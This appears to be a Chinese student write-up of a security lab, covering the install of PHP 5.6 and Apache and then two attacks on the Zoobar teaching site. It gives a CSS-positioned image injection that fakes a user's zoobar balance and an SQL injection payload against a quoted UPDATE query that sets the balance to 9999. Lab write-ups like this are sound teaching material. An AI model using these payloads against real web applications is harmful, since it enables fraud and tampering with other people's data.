資訊保安實踐Lab2-CSS
資訊保安實踐Lab2-CSS
Ubuntu20.04 安裝 php5.6 ,php5.6-mysql,apache2,mysql5.7
安裝php5.6,php5.6-mysql,apache2
sudo apt-get install -y language-pack-en-base
sudo LC_ALL=en_US.UTF-8 add-apt-repository ppa:ondrej/php
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php5.6
sudo apt-get install php5.6-mysql
sudo apt-get apache2
sudo a2dismod php7.4
sudo a2enmod php5.6
sudo service apache2 restart
安裝mysql5.7
https://blog.csdn.net/Deadly_97/article/details/111675825
問題1
問題2:Zoobar網站尋找漏洞
Manage your profile in the zoobar website, make your zoobars appear more than you really own. That is, after you modify your profile, when others or yourself look up your profile, they will see more zoobars than you actually own.
方法一:利用css
-
在a使用者的profile中輸入
<img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/> -
然後b使用者在User中輸入使用者名稱a,就會看到a有100個zoobars,其實a並沒有100個
方法二:sql注入
-
原始碼中,處理$profile引數sql語句如下:
$sql = "UPDATE Person SET Profile='$profile' ". "WHERE PersonID=$user->id"; -
假設第一個使用者a在profile中輸入
',Zoobars=9999,Profile='Welcome to my profile! -
最後執行的sql如下
update Person set Profile='',Zoobars=9999,Profile='Welcome to my profile!' where PeronID=1; -
最後再去查a的餘額就有9999個zoobars
相關文章
- 資訊保安原理與實踐(第2版)
- 智慧網聯汽車資訊保安風險分析及實踐探討
- 資訊保安實踐Lab3-CSRF&XSS&點選劫持
- 【資訊保安】SELinuxLinux
- 海雲安個人隱私資訊保安影響評估系統入個人資訊保護創新實踐案例
- 物聯網資訊保安
- 資訊保安入門指南
- 聚焦實踐|綠盟科技支援全國大學生資訊保安競賽東北、華中賽區
- 代理IP如何實現網路資訊保安防護?
- 資訊保安對稱密碼分析實驗總結密碼
- 曹政資訊保安課筆記-常見資訊保安的常識錯誤筆記
- 分享資訊保安工作小記
- 人工智慧與資訊保安人工智慧
- 如何保障Cookie的資訊保安Cookie
- 湖南發力資訊保安產業產業
- 資訊保安策略建立步驟
- 網路資訊保安論述
- 《防患未然:實施情報先導的資訊保安方法與實踐》——第2章什麼是情報2.1 引言
- 《資訊保安保障》一2.2 我國資訊保安保障工作主要內容
- 中新賽克夯實資訊保安,助力通訊部件國產化
- 古代密碼學與資訊保安密碼學
- 資訊保安與Linux系統Linux
- DefenseCode — 資訊保安測試工具
- 02-02-01 資訊保安框架框架
- 破解資訊保安產業的“人才荒”產業
- 資訊保安產業頻獲政策扶持產業
- 資料庫的資訊保安管理資料庫
- 【資訊保安】PAM模組的研究(二)
- 【資訊保安】PAM模組的研究(一)
- 《防患未然:實施情報先導的資訊保安方法與實踐》——第3章構建網路安全情報模型3.1 引言模型
- 智慧駕駛安全專題 | 資訊保安概念階段如何落地實施?
- 菜鳥的資訊保安學習之路
- CSAO註冊資訊保安意識官
- Linux賬戶資訊保安深入剖析Linux
- 資訊保安與密碼學概論密碼學
- 依法使用網路維護資訊保安
- 國產軟體劍指自主資訊保安
- 保障網路資訊保安需立法先行